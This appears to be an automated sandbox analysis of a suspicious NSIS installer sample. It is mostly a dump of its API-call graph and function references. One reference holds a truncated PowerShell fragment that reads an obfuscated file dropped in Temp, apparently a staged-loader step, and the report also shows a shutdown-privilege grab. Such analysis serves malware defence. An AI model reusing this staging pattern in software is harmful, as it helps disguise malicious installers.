405a2f lstrlenW FindFirstFileW 3986->3991 3987->3986 3990 405b1a 3988->3990 3989->3991 3990->3980 3992 405b59 3 API calls 3990->3992 3991->3981 4005 405a51 3991->4005 3993 405b24 3992->3993 3995 40594e 5 API calls 3993->3995 3994 405ad8 FindNextFileW 3998 405aee FindClose 3994->3998 3994->4005 3997 405b30 3995->3997 3999 405b34 3997->3999 4000 405b4a 3997->4000 3998->3981 3999->3980 4003 4052ec 24 API calls 3999->4003 4002 4052ec 24 API calls 4000->4002 4002->3980 4006 405b41 4003->4006 4004 405996 60 API calls 4004->4005 4005->3994 4005->4004 4007 4052ec 24 API calls 4005->4007 4009 4052ec 24 API calls 4005->4009 4010 40604a 36 API calls 4005->4010 4012 406284 lstrcpynW 4005->4012 4013 40594e 4005->4013 4008 40604a 36 API calls 4006->4008 4007->3994 4008->3980 4009->4005 4010->4005 4011->3983 4012->4005 4014 405d55 2 API calls 4013->4014 4015 40595a 4014->4015 4016 40597b 4015->4016 4017 405971 DeleteFileW 4015->4017 4018 405969 RemoveDirectoryW 4015->4018 4016->4005 4019 405977 4017->4019 4018->4019 4019->4016 4020 405987 SetFileAttributesW 4019->4020 4020->4016 4022 405f00 4021->4022 4023 405f26 GetShortPathNameW 4021->4023 4048 405d7a GetFileAttributesW CreateFileW 4022->4048 4025 406045 4023->4025 4026 405f3b 4023->4026 4025->3932 4026->4025 4028 405f43 wsprintfA 4026->4028 4027 405f0a CloseHandle GetShortPathNameW 4027->4025 4029 405f1e 4027->4029 4030 4062a6 17 API calls 4028->4030 4029->4023 4029->4025 4031 405f6b 4030->4031 4049 405d7a GetFileAttributesW CreateFileW 4031->4049 4033 405f78 4033->4025 4034 405f87 GetFileSize GlobalAlloc 4033->4034 4035 405fa9 4034->4035 4036 40603e CloseHandle 4034->4036 4037 405dfd ReadFile 4035->4037 4036->4025 4038 405fb1 4037->4038 4038->4036 4050 405cdf lstrlenA 4038->4050 4041 405fc8 lstrcpyA 4044 405fea 4041->4044 4042 405fdc 4043 405cdf 4 API calls 4042->4043 4043->4044 4045 406021 SetFilePointer 4044->4045 4046 405e2c WriteFile 4045->4046 4047 406037 GlobalFree 4046->4047 4047->4036 4048->4027 4049->4033 4051 405d20 
lstrlenA 4050->4051 4052 405d28 4051->4052 4053 405cf9 lstrcmpiA 4051->4053 4052->4041 4052->4042 4053->4052 4054 405d17 CharNextA 4053->4054 4054->4051 4159 402259 4160 402c41 17 API calls 4159->4160 4161 40225f 4160->4161 4162 402c41 17 API calls 4161->4162 4163 402268 4162->4163 4164 402c41 17 API calls 4163->4164 4165 402271 4164->4165 4166 4065c7 2 API calls 4165->4166 4167 40227a 4166->4167 4168 40228b lstrlenW lstrlenW 4167->4168 4173 40227e 4167->4173 4170 4052ec 24 API calls 4168->4170 4169 4052ec 24 API calls 4172 402286 4169->4172 4171 4022c9 SHFileOperationW 4170->4171 4171->4172 4171->4173 4173->4169 4173->4172 4181 40175c 4182 402c41 17 API calls 4181->4182 4183 401763 4182->4183 4184 405da9 2 API calls 4183->4184 4185 40176a 4184->4185 4185->4185 4186 401d5d GetDlgItem GetClientRect 4187 402c41 17 API calls 4186->4187 4188 401d8f LoadImageW SendMessageW 4187->4188 4189 402ac5 4188->4189 4190 401dad DeleteObject 4188->4190 4190->4189 4191 4022dd 4192 4022e4 4191->4192 4194 4022f7 4191->4194 4193 4062a6 17 API calls 4192->4193 4195 4022f1 4193->4195 4196 4058ea MessageBoxIndirectW 4195->4196 4196->4194 4197 405260 4198 405270 4197->4198 4199 405284 4197->4199 4200 405276 4198->4200 4201 4052cd 4198->4201 4202 40528c IsWindowVisible 4199->4202 4208 4052a3 4199->4208 4204 404247 SendMessageW 4200->4204 4203 4052d2 CallWindowProcW 4201->4203 4202->4201 4205 405299 4202->4205 4206 405280 4203->4206 4204->4206 4210 404bb6 SendMessageW 4205->4210 4208->4203 4215 404c36 4208->4215 4211 404c15 SendMessageW 4210->4211 4212 404bd9 GetMessagePos ScreenToClient SendMessageW 4210->4212 4214 404c0d 4211->4214 4213 404c12 4212->4213 4212->4214 4213->4211 4214->4208 4224 406284 lstrcpynW 4215->4224 4217 404c49 4225 4061cb wsprintfW 4217->4225 4219 404c53 4220 40140b 2 API calls 4219->4220 4221 404c5c 4220->4221 4226 406284 lstrcpynW 4221->4226 4223 404c63 4223->4201 4224->4217 4225->4219 4226->4223 4227 401563 4228 402a6b 4227->4228 4231 4061cb wsprintfW 4228->4231 
4230 402a70 4231->4230 3387 4023e4 3388 402c41 17 API calls 3387->3388 3389 4023f6 3388->3389 3390 402c41 17 API calls 3389->3390 3391 402400 3390->3391 3404 402cd1 3391->3404 3394 402ac5 3395 402438 3400 402444 3395->3400 3408 402c1f 3395->3408 3396 402c41 17 API calls 3397 40242e lstrlenW 3396->3397 3397->3395 3399 402463 RegSetValueExW 3402 402479 RegCloseKey 3399->3402 3400->3399 3411 403116 3400->3411 3402->3394 3405 402cec 3404->3405 3432 40611f 3405->3432 3409 4062a6 17 API calls 3408->3409 3410 402c34 3409->3410 3410->3400 3412 40312f 3411->3412 3413 40315a 3412->3413 3448 403311 SetFilePointer 3412->3448 3436 4032fb 3413->3436 3417 403177 GetTickCount 3428 40318a 3417->3428 3418 40329b 3419 40329f 3418->3419 3424 4032b7 3418->3424 3421 4032fb ReadFile 3419->3421 3420 403285 3420->3399 3421->3420 3422 4032fb ReadFile 3422->3424 3423 4032fb ReadFile 3423->3428 3424->3420 3424->3422 3425 405e2c WriteFile 3424->3425 3425->3424 3427 4031f0 GetTickCount 3427->3428 3428->3420 3428->3423 3428->3427 3429 403219 MulDiv wsprintfW 3428->3429 3439 4067df 3428->3439 3446 405e2c WriteFile 3428->3446 3430 4052ec 24 API calls 3429->3430 3430->3428 3433 40612e 3432->3433 3434 402410 3433->3434 3435 406139 RegCreateKeyExW 3433->3435 3434->3394 3434->3395 3434->3396 3435->3434 3449 405dfd ReadFile 3436->3449 3440 406804 3439->3440 3441 40680c 3439->3441 3440->3428 3441->3440 3442 406893 GlobalFree 3441->3442 3443 40689c GlobalAlloc 3441->3443 3444 406913 GlobalAlloc 3441->3444 3445 40690a GlobalFree 3441->3445 3442->3443 3443->3440 3443->3441 3444->3440 3444->3441 3445->3444 3447 405e4a 3446->3447 3447->3428 3448->3413 3450 403165 3449->3450 3450->3417 3450->3418 3450->3420 3495 402868 3496 402c41 17 API calls 3495->3496 3497 40286f FindFirstFileW 3496->3497 3498 402897 3497->3498 3502 402882 3497->3502 3503 4061cb wsprintfW 3498->3503 3500 4028a0 3504 406284 lstrcpynW 3500->3504 3503->3500 3504->3502 4232 404c68 GetDlgItem GetDlgItem 4233 404cba 7 API calls 4232->4233 4248 
404ed3 4232->4248 4234 404d50 SendMessageW 4233->4234 4235 404d5d DeleteObject 4233->4235 4234->4235 4236 404d66 4235->4236 4238 404d9d 4236->4238 4241 4062a6 17 API calls 4236->4241 4237 404fb7 4240 405063 4237->4240 4243 404ec6 4237->4243 4251 405010 SendMessageW 4237->4251 4239 4041fb 18 API calls 4238->4239 4242 404db1 4239->4242 4245 405075 4240->4245 4246 40506d SendMessageW 4240->4246 4247 404d7f SendMessageW SendMessageW 4241->4247 4250 4041fb 18 API calls 4242->4250 4252 404262 8 API calls 4243->4252 4244 404f44 4244->4237 4253 404fa9 SendMessageW 4244->4253 4254 405087 ImageList_Destroy 4245->4254 4255 40508e 4245->4255 4262 40509e 4245->4262 4246->4245 4247->4236 4248->4237 4248->4244 4249 404bb6 5 API calls 4248->4249 4249->4244 4265 404dbf 4250->4265 4251->4243 4257 405025 SendMessageW 4251->4257 4258 405259 4252->4258 4253->4237 4254->4255 4259 405097 GlobalFree 4255->4259 4255->4262 4256 40520d 4256->4243 4263 40521f ShowWindow GetDlgItem ShowWindow 4256->4263 4261 405038 4257->4261 4259->4262 4260 404e94 GetWindowLongW SetWindowLongW 4264 404ead 4260->4264 4271 405049 SendMessageW 4261->4271 4262->4256 4275 404c36 4 API calls 4262->4275 4277 4050d9 4262->4277 4263->4243 4266 404eb3 ShowWindow 4264->4266 4267 404ecb 4264->4267 4265->4260 4270 404e0f SendMessageW 4265->4270 4272 404e8e 4265->4272 4273 404e4b SendMessageW 4265->4273 4274 404e5c SendMessageW 4265->4274 4283 404230 SendMessageW 4266->4283 4284 404230 SendMessageW 4267->4284 4270->4265 4271->4240 4272->4260 4272->4264 4273->4265 4274->4265 4275->4277 4276 4051e3 InvalidateRect 4276->4256 4278 4051f9 4276->4278 4279 405107 SendMessageW 4277->4279 4282 40511d 4277->4282 4285 404b71 4278->4285 4279->4282 4281 405191 SendMessageW SendMessageW 4281->4282 4282->4276 4282->4281 4283->4243 4284->4248 4288 404aa8 4285->4288 4287 404b86 4287->4256 4289 404ac1 4288->4289 4290 4062a6 17 API calls 4289->4290 4291 404b25 4290->4291 4292 4062a6 17 API calls 4291->4292 4293 404b30 4292->4293 4294 4062a6 
17 API calls 4293->4294 4295 404b46 lstrlenW wsprintfW SetDlgItemTextW 4294->4295 4295->4287 4296 401968 4297 402c1f 17 API calls 4296->4297 4298 40196f 4297->4298 4299 402c1f 17 API calls 4298->4299 4300 40197c 4299->4300 4301 402c41 17 API calls 4300->4301 4302 401993 lstrlenW 4301->4302 4304 4019a4 4302->4304 4303 4019e5 4304->4303 4308 406284 lstrcpynW 4304->4308 4306 4019d5 4306->4303 4307 4019da lstrlenW 4306->4307 4307->4303 4308->4306 4309 40166a 4310 402c41 17 API calls 4309->4310 4311 401670 4310->4311 4312 4065c7 2 API calls 4311->4312 4313 401676 4312->4313 4314 40436b lstrlenW 4315 40438a 4314->4315 4316 40438c WideCharToMultiByte 4314->4316 4315->4316 4317 4046ec 4318 404718 4317->4318 4319 404729 4317->4319 4378 4058ce GetDlgItemTextW 4318->4378 4321 404735 GetDlgItem 4319->4321 4327 404794 4319->4327 4323 404749 4321->4323 4322 404723 4325 406518 5 API calls 4322->4325 4329 40475d SetWindowTextW 4323->4329 4334 405c04 4 API calls 4323->4334 4324 404878 4326 404a27 4324->4326 4380 4058ce GetDlgItemTextW 4324->4380 4325->4319 4333 404262 8 API calls 4326->4333 4327->4324 4327->4326 4330 4062a6 17 API calls 4327->4330 4332 4041fb 18 API calls 4329->4332 4335 404808 SHBrowseForFolderW 4330->4335 4331 4048a8 4336 405c61 18 API calls 4331->4336 4337 404779 4332->4337 4338 404a3b 4333->4338 4339 404753 4334->4339 4335->4324 4340 404820 CoTaskMemFree 4335->4340 4341 4048ae 4336->4341 4342 4041fb 18 API calls 4337->4342 4339->4329 4343 405b59 3 API calls 4339->4343 4344 405b59 3 API calls 4340->4344 4381 406284 lstrcpynW 4341->4381 4345 404787 4342->4345 4343->4329 4346 40482d 4344->4346 4379 404230 SendMessageW 4345->4379 4349 404864 SetDlgItemTextW 4346->4349 4354 4062a6 17 API calls 4346->4354 4349->4324 4350 40478d 4352 40665e 5 API calls 4350->4352 4351 4048c5 4353 40665e 5 API calls 4351->4353 4352->4327 4361 4048cc 4353->4361 4355 40484c lstrcmpiW 4354->4355 4355->4349 4358 40485d lstrcatW 4355->4358 4356 40490d 4382 406284 lstrcpynW 4356->4382 
4358->4349 4359 404914 4360 405c04 4 API calls 4359->4360 4362 40491a GetDiskFreeSpaceW 4360->4362 4361->4356 4364 405ba5 2 API calls 4361->4364 4366 404965 4361->4366 4365 40493e MulDiv 4362->4365 4362->4366 4364->4361 4365->4366 4367 4049d6 4366->4367 4368 404b71 20 API calls 4366->4368 4369 4049f9 4367->4369 4371 40140b 2 API calls 4367->4371 4370 4049c3 4368->4370 4383 40421d KiUserCallbackDispatcher 4369->4383 4373 4049d8 SetDlgItemTextW 4370->4373 4374 4049c8 4370->4374 4371->4369 4373->4367 4376 404aa8 20 API calls 4374->4376 4375 404a15 4375->4326 4384 404645 4375->4384 4376->4367 4378->4322 4379->4350 4380->4331 4381->4351 4382->4359 4383->4375 4385 404653 4384->4385 4386 404658 SendMessageW 4384->4386 4385->4386 4386->4326 3632 40176f 3633 402c41 17 API calls 3632->3633 3634 401776 3633->3634 3635 401796 3634->3635 3636 40179e 3634->3636 3674 406284 lstrcpynW 3635->3674 3675 406284 lstrcpynW 3636->3675 3639 4017a9 3676 405b59 lstrlenW CharPrevW 3639->3676 3640 40179c 3643 406518 5 API calls 3640->3643 3654 4017bb 3643->3654 3647 4017cd CompareFileTime 3647->3654 3648 40188d 3649 4052ec 24 API calls 3648->3649 3652 401897 3649->3652 3650 4052ec 24 API calls 3653 401879 3650->3653 3651 406284 lstrcpynW 3651->3654 3655 403116 35 API calls 3652->3655 3654->3647 3654->3648 3654->3651 3658 4062a6 17 API calls 3654->3658 3669 401864 3654->3669 3670 405d55 GetFileAttributesW 3654->3670 3673 405d7a GetFileAttributesW CreateFileW 3654->3673 3679 4065c7 FindFirstFileW 3654->3679 3682 4058ea 3654->3682 3656 4018aa 3655->3656 3657 4018be SetFileTime 3656->3657 3659 4018d0 CloseHandle 3656->3659 3657->3659 3658->3654 3659->3653 3660 4018e1 3659->3660 3661 4018e6 3660->3661 3662 4018f9 3660->3662 3663 4062a6 17 API calls 3661->3663 3664 4062a6 17 API calls 3662->3664 3665 4018ee lstrcatW 3663->3665 3666 401901 3664->3666 3665->3666 3668 4058ea MessageBoxIndirectW 3666->3668 3668->3653 3669->3650 3669->3653 3671 405d74 3670->3671 3672 405d67 SetFileAttributesW 3670->3672 
3671->3654 3672->3671 3673->3654 3674->3640 3675->3639 3677 4017af lstrcatW 3676->3677 3678 405b75 lstrcatW 3676->3678 3677->3640 3678->3677 3680 4065dd FindClose 3679->3680 3681 4065e8 3679->3681 3680->3681 3681->3654 3683 4058ff 3682->3683 3684 40594b 3683->3684 3685 405913 MessageBoxIndirectW 3683->3685 3684->3654 3685->3684 4387 4027ef 4388 4027f6 4387->4388 4390 402a70 4387->4390 4389 402c1f 17 API calls 4388->4389 4391 4027fd 4389->4391 4392 40280c SetFilePointer 4391->4392 4392->4390 4393 40281c 4392->4393 4395 4061cb wsprintfW 4393->4395 4395->4390 4396 401a72 4397 402c1f 17 API calls 4396->4397 4398 401a7b 4397->4398 4399 402c1f 17 API calls 4398->4399 4400 401a20 4399->4400 3687 401573 3688 401583 ShowWindow 3687->3688 3689 40158c 3687->3689 3688->3689 3690 402ac5 3689->3690 3691 40159a ShowWindow 3689->3691 3691->3690 4408 402df3 4409 402e05 SetTimer 4408->4409 4411 402e1e 4408->4411 4409->4411 4410 402e73 4411->4410 4412 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4412 4412->4410 4413 401cf3 4414 402c1f 17 API calls 4413->4414 4415 401cf9 IsWindow 4414->4415 4416 401a20 4415->4416 4417 4014f5 SetForegroundWindow 4418 402ac5 4417->4418 4419 402576 4420 402c41 17 API calls 4419->4420 4421 40257d 4420->4421 4424 405d7a GetFileAttributesW CreateFileW 4421->4424 4423 402589 4424->4423 3696 401b77 3697 401b84 3696->3697 3698 401bc8 3696->3698 3699 4022e4 3697->3699 3705 401b9b 3697->3705 3700 401bf2 GlobalAlloc 3698->3700 3701 401bcd 3698->3701 3702 4062a6 17 API calls 3699->3702 3703 4062a6 17 API calls 3700->3703 3709 401c0d 3701->3709 3717 406284 lstrcpynW 3701->3717 3704 4022f1 3702->3704 3703->3709 3711 4058ea MessageBoxIndirectW 3704->3711 3715 406284 lstrcpynW 3705->3715 3708 401bdf GlobalFree 3708->3709 3710 401baa 3716 406284 lstrcpynW 3710->3716 3711->3709 3713 401bb9 3718 406284 lstrcpynW 3713->3718 3715->3710 3716->3713 3717->3708 3718->3709 4425 4024f8 4426 402c81 17 API calls 4425->4426 4427 402502 4426->4427 4428 402c1f 17 API 
calls 4427->4428 4429 40250b 4428->4429 4430 402533 RegEnumValueW 4429->4430 4431 402527 RegEnumKeyW 4429->4431 4433 40288b 4429->4433 4432 402548 RegCloseKey 4430->4432 4431->4432 4432->4433 4435 40167b 4436 402c41 17 API calls 4435->4436 4437 401682 4436->4437 4438 402c41 17 API calls 4437->4438 4439 40168b 4438->4439 4440 402c41 17 API calls 4439->4440 4441 401694 MoveFileW 4440->4441 4442 4016a0 4441->4442 4443 4016a7 4441->4443 4444 401423 24 API calls 4442->4444 4445 4065c7 2 API calls 4443->4445 4447 402250 4443->4447 4444->4447 4446 4016b6 4445->4446 4446->4447 4448 40604a 36 API calls 4446->4448 4448->4442 4449 401e7d 4450 402c41 17 API calls 4449->4450 4451 401e83 4450->4451 4452 402c41 17 API calls 4451->4452 4453 401e8c 4452->4453 4454 402c41 17 API calls 4453->4454 4455 401e95 4454->4455 4456 402c41 17 API calls 4455->4456 4457 401e9e 4456->4457 4458 401423 24 API calls 4457->4458 4459 401ea5 4458->4459 4466 4058b0 ShellExecuteExW 4459->4466 4461 401ee7 4462 40670f 5 API calls 4461->4462 4464 40288b 4461->4464 4463 401f01 CloseHandle 4462->4463 4463->4464 4466->4461 4467 4019ff 4468 402c41 17 API calls 4467->4468 4469 401a06 4468->4469 4470 402c41 17 API calls 4469->4470 4471 401a0f 4470->4471 4472 401a16 lstrcmpiW 4471->4472 4473 401a28 lstrcmpW 4471->4473 4474 401a1c 4472->4474 4473->4474 4475 401000 4476 401037 BeginPaint GetClientRect 4475->4476 4477 40100c DefWindowProcW 4475->4477 4479 4010f3 4476->4479 4480 401179 4477->4480 4481 401073 CreateBrushIndirect FillRect DeleteObject 4479->4481 4482 4010fc 4479->4482 4481->4479 4483 401102 CreateFontIndirectW 4482->4483 4484 401167 EndPaint 4482->4484 4483->4484 4485 401112 6 API calls 4483->4485 4484->4480 4485->4484 4493 401503 4494 40150b 4493->4494 4496 40151e 4493->4496 4495 402c1f 17 API calls 4494->4495 4495->4496 3451 402104 3452 402c41 17 API calls 3451->3452 3453 40210b 3452->3453 3454 402c41 17 API calls 3453->3454 3455 402115 3454->3455 3456 402c41 17 API calls 3455->3456 3457 40211f 
3456->3457 3458 402c41 17 API calls 3457->3458 3459 402129 3458->3459 3460 402c41 17 API calls 3459->3460 3462 402133 3460->3462 3461 402172 CoCreateInstance 3466 402191 3461->3466 3462->3461 3463 402c41 17 API calls 3462->3463 3463->3461 3464 401423 24 API calls 3465 402250 3464->3465 3466->3464 3466->3465 4497 402484 4498 402c81 17 API calls 4497->4498 4499 40248e 4498->4499 4500 402c41 17 API calls 4499->4500 4501 402497 4500->4501 4502 4024a2 RegQueryValueExW 4501->4502 4503 40288b 4501->4503 4504 4024c2 4502->4504 4507 4024c8 RegCloseKey 4502->4507 4504->4507 4508 4061cb wsprintfW 4504->4508 4507->4503 4508->4507 3467 401f06 3468 402c41 17 API calls 3467->3468 3469 401f0c 3468->3469 3470 4052ec 24 API calls 3469->3470 3471 401f16 3470->3471 3482 40586d CreateProcessW 3471->3482 3474 401f3f CloseHandle 3478 40288b 3474->3478 3477 401f31 3479 401f41 3477->3479 3480 401f36 3477->3480 3479->3474 3490 4061cb wsprintfW 3480->3490 3483 4058a0 CloseHandle 3482->3483 3484 401f1c 3482->3484 3483->3484 3484->3474 3484->3478 3485 40670f WaitForSingleObject 3484->3485 3486 406729 3485->3486 3487 40673b GetExitCodeProcess 3486->3487 3491 40669a 3486->3491 3487->3477 3490->3474 3492 4066b7 PeekMessageW 3491->3492 3493 4066c7 WaitForSingleObject 3492->3493 3494 4066ad DispatchMessageW 3492->3494 3493->3486 3494->3492 3563 40230c 3564 402314 3563->3564 3565 40231a 3563->3565 3566 402c41 17 API calls 3564->3566 3567 402c41 17 API calls 3565->3567 3569 402328 3565->3569 3566->3565 3567->3569 3568 402336 3571 402c41 17 API calls 3568->3571 3569->3568 3570 402c41 17 API calls 3569->3570 3570->3568 3572 40233f WritePrivateProfileStringW 3571->3572 3573 401f8c 3574 402c41 17 API calls 3573->3574 3575 401f93 3574->3575 3576 40665e 5 API calls 3575->3576 3577 401fa2 GetFileVersionInfoSizeW 3576->3577 3578 402ac5 3577->3578 3579 401fbe GlobalAlloc 3577->3579 3579->3578 3580 401fd2 3579->3580 3581 40665e 5 API calls 3580->3581 3582 401fd9 3581->3582 3583 40665e 5 API calls 3582->3583 
3585 401fe3 3583->3585 3584 402026 3584->3578 3585->3584 3589 4061cb wsprintfW 3585->3589 3587 402018 3590 4061cb wsprintfW 3587->3590 3589->3587 3590->3584 4509 40190c 4510 401943 4509->4510 4511 402c41 17 API calls 4510->4511 4512 401948 4511->4512 4513 405996 67 API calls 4512->4513 4514 401951 4513->4514 3598 40238e 3599 4023c1 3598->3599 3600 402396 3598->3600 3602 402c41 17 API calls 3599->3602 3610 402c81 3600->3610 3604 4023c8 3602->3604 3615 402cff 3604->3615 3605 4023a7 3608 402c41 17 API calls 3605->3608 3607 4023d5 3609 4023ae RegDeleteValueW RegCloseKey 3608->3609 3609->3607 3611 402c41 17 API calls 3610->3611 3612 402c98 3611->3612 3613 4060f1 RegOpenKeyExW 3612->3613 3614 40239d 3613->3614 3614->3605 3614->3607 3616 402d13 3615->3616 3617 402d0c 3615->3617 3616->3617 3619 402d44 3616->3619 3617->3607 3620 4060f1 RegOpenKeyExW 3619->3620 3621 402d72 3620->3621 3622 402dec 3621->3622 3626 402d76 3621->3626 3622->3617 3623 402d98 RegEnumKeyW 3624 402daf RegCloseKey 3623->3624 3623->3626 3627 40665e 5 API calls 3624->3627 3625 402dd0 RegCloseKey 3625->3622 3626->3623 3626->3624 3626->3625 3628 402d44 6 API calls 3626->3628 3629 402dbf 3627->3629 3628->3626 3630 402de0 RegDeleteKeyW 3629->3630 3631 402dc3 3629->3631 3630->3622 3631->3622 4515 40698e 4521 406812 4515->4521 4516 40717d 4517 406893 GlobalFree 4518 40689c GlobalAlloc 4517->4518 4518->4516 4518->4521 4519 406913 GlobalAlloc 4519->4516 4519->4521 4520 40690a GlobalFree 4520->4519 4521->4516 4521->4517 4521->4518 4521->4519 4521->4520 4522 40190f 4523 402c41 17 API calls 4522->4523 4524 401916 4523->4524 4525 4058ea MessageBoxIndirectW 4524->4525 4526 40191f 4525->4526 4527 401491 4528 4052ec 24 API calls 4527->4528 4529 401498 4528->4529 4530 401d14 4531 402c1f 17 API calls 4530->4531 4532 401d1b 4531->4532 4533 402c1f 17 API calls 4532->4533 4534 401d27 GetDlgItem 4533->4534 4535 402592 4534->4535 4543 402598 4544 4025c7 4543->4544 4545 4025ac 4543->4545 4547 4025fb 4544->4547 4548 4025cc 
4544->4548 4546 402c1f 17 API calls 4545->4546 4553 4025b3 4546->4553 4550 402c41 17 API calls 4547->4550 4549 402c41 17 API calls 4548->4549 4551 4025d3 WideCharToMultiByte lstrlenA 4549->4551 4552 402602 lstrlenW 4550->4552 4551->4553 4552->4553 4554 40262f 4553->4554 4556 405e5b 5 API calls 4553->4556 4557 402645 4553->4557 4555 405e2c WriteFile 4554->4555 4554->4557 4555->4557 4556->4554 4558 40149e 4559 4014ac PostQuitMessage 4558->4559 4560 4022f7 4558->4560 4559->4560 4561 401c1f 4562 402c1f 17 API calls 4561->4562 4563 401c26 4562->4563 4564 402c1f 17 API calls 4563->4564 4565 401c33 4564->4565 4566 401c48 4565->4566 4567 402c41 17 API calls 4565->4567 4568 401c58 4566->4568 4569 402c41 17 API calls 4566->4569 4567->4566 4570 401c63 4568->4570 4571 401caf 4568->4571 4569->4568 4573 402c1f 17 API calls 4570->4573 4572 402c41 17 API calls 4571->4572 4574 401cb4 4572->4574 4575 401c68 4573->4575 4576 402c41 17 API calls 4574->4576 4577 402c1f 17 API calls 4575->4577 4578 401cbd FindWindowExW 4576->4578 4579 401c74 4577->4579 4582 401cdf 4578->4582 4580 401c81 SendMessageTimeoutW 4579->4580 4581 401c9f SendMessageW 4579->4581 4580->4582 4581->4582 4583 402aa0 SendMessageW 4584 402ac5 4583->4584 4585 402aba InvalidateRect 4583->4585 4585->4584 4586 402821 4587 402827 4586->4587 4588 40282f FindClose 4587->4588 4589 402ac5 4587->4589 4588->4589 3276 403d22 3277 403e75 3276->3277 3278 403d3a 3276->3278 3279 403ec6 3277->3279 3280 403e86 GetDlgItem GetDlgItem 3277->3280 3278->3277 3281 403d46 3278->3281 3283 403f20 3279->3283 3293 401389 2 API calls 3279->3293 3282 4041fb 18 API calls 3280->3282 3284 403d51 SetWindowPos 3281->3284 3285 403d64 3281->3285 3288 403eb0 SetClassLongW 3282->3288 3308 403e70 3283->3308 3347 404247 3283->3347 3284->3285 3286 403d81 3285->3286 3287 403d69 ShowWindow 3285->3287 3290 403da3 3286->3290 3291 403d89 DestroyWindow 3286->3291 3287->3286 3292 40140b 2 API calls 3288->3292 3294 403da8 SetWindowLongW 3290->3294 3295 403db9 3290->3295 

Control-flow Graph (function 403359; legend: Executed, Not Executed)
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                                        • GetVersion.KERNEL32 ref: 00403382
                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                        • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                        • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                        • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000020,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                        • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                          • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                        • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                        • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                        • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                        • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                        • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                        • ExitProcess.KERNEL32 ref: 00403894
                                                                                                        Memory Dump Source
